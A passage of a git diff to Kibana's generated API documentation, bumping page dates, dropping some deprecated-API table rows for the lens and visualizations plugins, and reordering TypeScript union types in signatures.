\"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", diff --git a/api_docs/data_views.mdx b/api_docs/data_views.mdx index 9e62436afe33c..a521d13aa7389 100644 --- a/api_docs/data_views.mdx +++ b/api_docs/data_views.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViews title: "dataViews" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViews plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViews'] --- import dataViewsObj from './data_views.devdocs.json'; diff --git a/api_docs/data_visualizer.mdx b/api_docs/data_visualizer.mdx index be172e288b8b6..2802ac97df0b5 100644 --- a/api_docs/data_visualizer.mdx +++ b/api_docs/data_visualizer.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataVisualizer title: "dataVisualizer" image: https://source.unsplash.com/400x175/?github description: API docs for the dataVisualizer plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataVisualizer'] --- import dataVisualizerObj from './data_visualizer.devdocs.json'; diff --git a/api_docs/deprecations_by_api.mdx b/api_docs/deprecations_by_api.mdx index af96684e0b49b..c6968e111b533 100644 --- a/api_docs/deprecations_by_api.mdx +++ b/api_docs/deprecations_by_api.mdx @@ -7,7 +7,7 @@ id: kibDevDocsDeprecationsByApi slug: /kibana-dev-docs/api-meta/deprecated-api-list-by-api title: Deprecated API usage by API description: A list of deprecated APIs, which plugins are still referencing them, and when they need to be removed by. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- @@ -47,7 +47,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | dataViewManagement | - | | | dataViewManagement | - | | | lens, observability, dataVisualizer, fleet, cloudSecurityPosture, discoverEnhanced, osquery, synthetics | - | -| | esUiShared, home, data, spaces, fleet, visualizations, lens, observability, ml, apm, indexLifecycleManagement, synthetics, upgradeAssistant, ux, savedObjectsManagement, kibanaOverview | - | +| | esUiShared, home, data, spaces, fleet, observability, ml, apm, indexLifecycleManagement, synthetics, upgradeAssistant, ux, savedObjectsManagement, kibanaOverview | - | | | management, spaces, ml, canvas, enterpriseSearch, osquery, home | - | | | canvas, visTypeXy | - | | | canvas | - | @@ -72,7 +72,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | apm, security, securitySolution | 8.8.0 | | | visualizations, dashboard, lens, maps, ml, securitySolution, security | 8.8.0 | | | securitySolution | 8.8.0 | -| | savedObjectsTaggingOss, visualizations, dashboard, lens | 8.8.0 | +| | savedObjectsTaggingOss, dashboard | 8.8.0 | | | dashboard | 8.8.0 | | | maps, dashboard | 8.8.0 | | | monitoring, kibanaUsageCollection, @kbn/core-metrics-server-internal | 8.8.0 | diff --git a/api_docs/deprecations_by_plugin.mdx b/api_docs/deprecations_by_plugin.mdx index b0a9f410ca204..7614694432f40 100644 --- a/api_docs/deprecations_by_plugin.mdx +++ b/api_docs/deprecations_by_plugin.mdx @@ -7,7 +7,7 @@ id: kibDevDocsDeprecationsByPlugin slug: /kibana-dev-docs/api-meta/deprecated-api-list-by-plugin title: Deprecated API usage by plugin description: A list of deprecated APIs, which plugins are still referencing them, and when they need to be removed by. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- @@ -355,8 +355,6 @@ so TS and code-reference navigation might not highlight them. | | Deprecated API | Reference location(s) | Remove By | | ---------------|-----------|-----------| | | [lens_top_nav.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/lens_top_nav.tsx#:~:text=indexPatternId) | - | -| | [workspace_panel.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx#:~:text=RedirectAppLinks), [workspace_panel.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx#:~:text=RedirectAppLinks), [workspace_panel.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx#:~:text=RedirectAppLinks) | - | -| | [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject) | 8.8.0 | | | [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), [mounter.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/mounter.tsx#:~:text=onAppLeave) | 8.8.0 | @@ -693,8 +691,6 @@ migrates to using the Kibana Privilege model: https://github.com/elastic/kibana/ | Deprecated API | Reference location(s) | Remove By | | ---------------|-----------|-----------| -| | [get_table_columns.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx#:~:text=RedirectAppLinks), [get_table_columns.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx#:~:text=RedirectAppLinks), [get_table_columns.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx#:~:text=RedirectAppLinks) | - | -| | [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject) | 8.8.0 | | | [visualize_top_nav.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_top_nav.tsx#:~:text=onAppLeave), [visualize_editor_common.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_editor_common.tsx#:~:text=onAppLeave), [app.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/app.tsx#:~:text=onAppLeave), [index.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/index.tsx#:~:text=onAppLeave) | 8.8.0 | diff --git a/api_docs/deprecations_by_team.mdx b/api_docs/deprecations_by_team.mdx index 15bf0dc01f1e8..23a8791ccc759 100644 --- a/api_docs/deprecations_by_team.mdx +++ b/api_docs/deprecations_by_team.mdx @@ -7,7 +7,7 @@ id: kibDevDocsDeprecationsDueByTeam slug: /kibana-dev-docs/api-meta/deprecations-due-by-team title: Deprecated APIs due to be removed, by team description: Lists the teams that are referencing deprecated APIs with a remove by date. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- @@ -190,6 +190,5 @@ migrates to using the Kibana Privilege model: https://github.com/elastic/kibana/ | Plugin | Deprecated API | Reference location(s) | Remove By | | --------|-------|-----------|-----------| -| lens | | [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject) | 8.8.0 | | lens | | [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), [mounter.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/mounter.tsx#:~:text=onAppLeave), [visualize_top_nav.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_top_nav.tsx#:~:text=onAppLeave), [visualize_editor_common.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_editor_common.tsx#:~:text=onAppLeave), [app.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/app.tsx#:~:text=onAppLeave), [index.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/index.tsx#:~:text=onAppLeave) | 8.8.0 | | management | | [application.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/management/public/application.tsx#:~:text=appBasePath) | 8.8.0 | \ No newline at end of file diff --git a/api_docs/dev_tools.mdx b/api_docs/dev_tools.mdx index 8623627c9eafd..fe4a8f7fb1b48 100644 --- a/api_docs/dev_tools.mdx +++ b/api_docs/dev_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/devTools title: "devTools" image: https://source.unsplash.com/400x175/?github description: API docs for the devTools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'devTools'] --- import devToolsObj from './dev_tools.devdocs.json'; diff --git a/api_docs/discover.mdx b/api_docs/discover.mdx index 554ebb7922a9c..d3d34b75e18b4 100644 --- a/api_docs/discover.mdx +++ b/api_docs/discover.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/discover title: "discover" image: https://source.unsplash.com/400x175/?github description: API docs for the discover plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'discover'] --- import discoverObj from './discover.devdocs.json'; diff --git a/api_docs/discover_enhanced.mdx b/api_docs/discover_enhanced.mdx index 555a68939586c..debc000f91cf8 100644 --- a/api_docs/discover_enhanced.mdx +++ b/api_docs/discover_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/discoverEnhanced title: "discoverEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the discoverEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'discoverEnhanced'] --- import discoverEnhancedObj from './discover_enhanced.devdocs.json'; diff --git a/api_docs/elastic_apm_synthtrace.mdx b/api_docs/elastic_apm_synthtrace.mdx index 5cd02bc034e8e..20db74caf8ea0 100644 --- a/api_docs/elastic_apm_synthtrace.mdx +++ b/api_docs/elastic_apm_synthtrace.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/elastic-apm-synthtrace title: "@elastic/apm-synthtrace" image: https://source.unsplash.com/400x175/?github description: API docs for the @elastic/apm-synthtrace plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@elastic/apm-synthtrace'] --- import elasticApmSynthtraceObj from './elastic_apm_synthtrace.devdocs.json'; diff --git a/api_docs/embeddable.mdx b/api_docs/embeddable.mdx index 7f6752b844c5b..44b34351db15e 100644 --- a/api_docs/embeddable.mdx +++ b/api_docs/embeddable.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/embeddable title: "embeddable" image: https://source.unsplash.com/400x175/?github description: API docs for the embeddable plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'embeddable'] --- import embeddableObj from './embeddable.devdocs.json'; diff --git a/api_docs/embeddable_enhanced.mdx b/api_docs/embeddable_enhanced.mdx index d71fc3d7a5a8b..f2ebec2b2a4b3 100644 --- a/api_docs/embeddable_enhanced.mdx +++ b/api_docs/embeddable_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/embeddableEnhanced title: "embeddableEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the embeddableEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'embeddableEnhanced'] --- import embeddableEnhancedObj from './embeddable_enhanced.devdocs.json'; diff --git a/api_docs/encrypted_saved_objects.mdx b/api_docs/encrypted_saved_objects.mdx index 334ea7d608dd6..9c9b7e58e1623 100644 --- a/api_docs/encrypted_saved_objects.mdx +++ b/api_docs/encrypted_saved_objects.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/encryptedSavedObjects title: "encryptedSavedObjects" image: https://source.unsplash.com/400x175/?github description: API docs for the encryptedSavedObjects plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'encryptedSavedObjects'] --- import encryptedSavedObjectsObj from './encrypted_saved_objects.devdocs.json'; diff --git a/api_docs/enterprise_search.mdx b/api_docs/enterprise_search.mdx index 6d8c6670d585a..eccccd8e0c8f3 100644 --- a/api_docs/enterprise_search.mdx +++ b/api_docs/enterprise_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/enterpriseSearch title: "enterpriseSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the enterpriseSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'enterpriseSearch'] --- import enterpriseSearchObj from './enterprise_search.devdocs.json'; diff --git a/api_docs/es_ui_shared.devdocs.json b/api_docs/es_ui_shared.devdocs.json index 18fe88540dc40..8cf1ece3e2dbd 100644 --- a/api_docs/es_ui_shared.devdocs.json +++ b/api_docs/es_ui_shared.devdocs.json @@ -1215,7 +1215,7 @@ "label": "method", "description": [], "signature": [ - "\"get\" | \"delete\" | \"post\" | \"put\" | \"patch\" | \"head\"" + "\"get\" | \"post\" | \"put\" | \"delete\" | \"patch\" | \"head\"" ], "path": "src/plugins/es_ui_shared/public/request/send_request.ts", "deprecated": false diff --git a/api_docs/es_ui_shared.mdx b/api_docs/es_ui_shared.mdx index 0e1cc17c66384..a6169ade9a7f0 100644 --- a/api_docs/es_ui_shared.mdx +++ b/api_docs/es_ui_shared.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/esUiShared title: "esUiShared" image: https://source.unsplash.com/400x175/?github description: API docs for the esUiShared plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'esUiShared'] --- import esUiSharedObj from './es_ui_shared.devdocs.json'; diff --git a/api_docs/event_annotation.devdocs.json b/api_docs/event_annotation.devdocs.json index 44dbbcb93afdb..45958ad9a1352 100644 --- a/api_docs/event_annotation.devdocs.json +++ b/api_docs/event_annotation.devdocs.json @@ -373,7 +373,7 @@ "label": "AvailableAnnotationIcon", "description": [], "signature": [ - "\"alert\" | \"circle\" | \"asterisk\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\"" + "\"circle\" | \"asterisk\" | \"alert\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\"" ], "path": "src/plugins/event_annotation/common/types.ts", "deprecated": false, @@ -847,7 +847,7 @@ "label": "options", "description": [], "signature": [ - "(\"alert\" | \"circle\" | \"asterisk\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\")[]" + "(\"circle\" | \"asterisk\" | \"alert\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\")[]" ], "path": "src/plugins/event_annotation/common/manual_event_annotation/index.ts", "deprecated": false diff --git a/api_docs/event_annotation.mdx b/api_docs/event_annotation.mdx index a58d2ee63b8c2..c81c793c6bc06 100644 --- a/api_docs/event_annotation.mdx +++ b/api_docs/event_annotation.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/eventAnnotation title: "eventAnnotation" image: https://source.unsplash.com/400x175/?github description: API docs for the eventAnnotation plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'eventAnnotation'] --- import eventAnnotationObj from './event_annotation.devdocs.json'; diff --git a/api_docs/event_log.devdocs.json b/api_docs/event_log.devdocs.json index c31770f76221c..ec9ab9ec49812 100644 --- a/api_docs/event_log.devdocs.json +++ b/api_docs/event_log.devdocs.json @@ -1123,7 +1123,7 @@ "label": "data", "description": [], "signature": [ - "(Readonly<{ error?: Readonly<{ type?: string | undefined; id?: string | undefined; message?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; tags?: string[] | undefined; kibana?: Readonly<{ version?: string | undefined; alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; id?: string | undefined; namespace?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; name?: string | undefined; version?: string | undefined; description?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; end?: string | undefined; original?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined)[]" + "(Readonly<{ error?: Readonly<{ type?: string | undefined; message?: string | undefined; id?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; tags?: string[] | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; kibana?: Readonly<{ alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; version?: string | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; namespace?: string | undefined; id?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; description?: string | undefined; name?: string | undefined; version?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; end?: string | undefined; original?: string | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined)[]" ], "path": "x-pack/plugins/event_log/server/es/cluster_client_adapter.ts", "deprecated": false @@ -1142,7 +1142,7 @@ "label": "IEvent", "description": [], "signature": [ - "DeepPartial | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; tags?: string[] | undefined; kibana?: Readonly<{ version?: string | undefined; alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; id?: string | undefined; namespace?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; name?: string | undefined; version?: string | undefined; description?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; end?: string | undefined; original?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}>>> | undefined" 